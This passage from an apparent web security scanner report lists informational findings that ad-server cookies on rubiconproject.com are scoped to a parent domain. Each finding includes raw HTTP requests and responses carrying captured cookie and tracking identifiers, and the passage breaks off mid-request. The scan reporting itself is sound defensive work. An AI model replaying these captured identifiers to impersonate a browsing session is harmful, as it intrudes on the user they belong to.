User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; ses15=12338^3&12590^2; csi15=3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535

Response

8.31. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^12&12590^84; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63532; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.html?cb=0.6520654342602938&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^7; rdk=7725/12338; ses2=12338^14&12590^6

Response

8.32. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=4e8588dd3e9c0c4d453ad2c4^&12338^1&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62962; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.html?cb=0.6706412732601166&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^18&12590^6; rdk=7856/12590; ses15=12338^11&12590^9

Response

8.33. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=12338^119&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
csi2=3151648.js^1^1315404888^1315404888&3152310.js^1^1315404888^1315404888&3165011.js^3^1315404888^1315404888&3196945.js^1^1315404887^1315404887&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^268308726; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^119&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3151648.js^1^1315404888^1315404888&3152310.js^1^1315404888^1315404888&3165011.js^3^1315404888^1315404888&3196945.js^1^1315404887^1315404887&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^268308726; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1733

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151648"
...[SNIP]...

8.34. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=12338^5&12590^5; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
csi15=3151650.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D31733135.js&size_id=15&account_id=7856&site_id=12590&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=0; ses15=12338^3&12590^3; csi15=3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

8.35. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%265328%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; expires=Fri, 06-Sep-2013 14:14:35 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5328&nid=2025&put=f9bdca69-e609-4297-9145-48ea56a0756c&expires=730 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%265328%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%265328%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; expires=Fri, 06-Sep-2013 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.36. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Sat, 17-Sep-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Sat, 17-Sep-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.37. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%265852%3D1%267727%3D1; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?expires=30&nid=2245&put=b6ae888c-d95b-11e0-b096-0025900e0834&v=7727 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; 